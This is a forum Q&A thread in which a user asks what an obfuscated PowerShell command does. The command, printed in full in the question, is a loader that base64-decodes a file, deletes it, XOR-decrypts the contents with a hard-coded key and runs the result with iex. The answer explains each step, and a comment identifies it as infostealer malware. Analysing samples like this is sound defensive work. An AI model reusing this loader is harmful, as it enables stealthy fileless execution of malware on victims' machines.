# Can someone help me understand what this PowerShell script is doing?

Tags: powershell, base64

Can someone help with determining what this script is performing? Is it decoding its base64 from the .txt file, and gathering the system IO, or is there not enough context?

```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\user\6a54473f352d947ea77fc3e8c2637d39.txt';$xk='tdVmiOyHNCDnRSPhuBblQTxFcaYUsZvXeIzAwEroJMKqjLGkpgfW';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
```

Comment: This question is too broad. You should write what you expect to achieve with this script, show what is the result and ask precisely about what is working badly or not working.

Answer (score 0, accepted):

This PowerShell script reads a file (`C:\Users\user\6a54473f352d947ea77fc3e8c2637d39.txt`) and converts the file to Base64 Encoded String. After that, it uses `tdVmiOyHNCDnRSPhuBblQTxFcaYUsZvXeIzAwEroJMKqjLGkpgfW` as key and performs XOR on the data, essentially decrypting the data in the file. After that, the decrypted text is executed, which means the file should contain some PowerShell commands in encrypted form for this script to work. The file is also deleted once it's read.

Comment: This ended up being a piece of malware; https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/Jupyter%20Infostealer%20WEB.pdf

Comment: @Mysicksi I was thinking the same.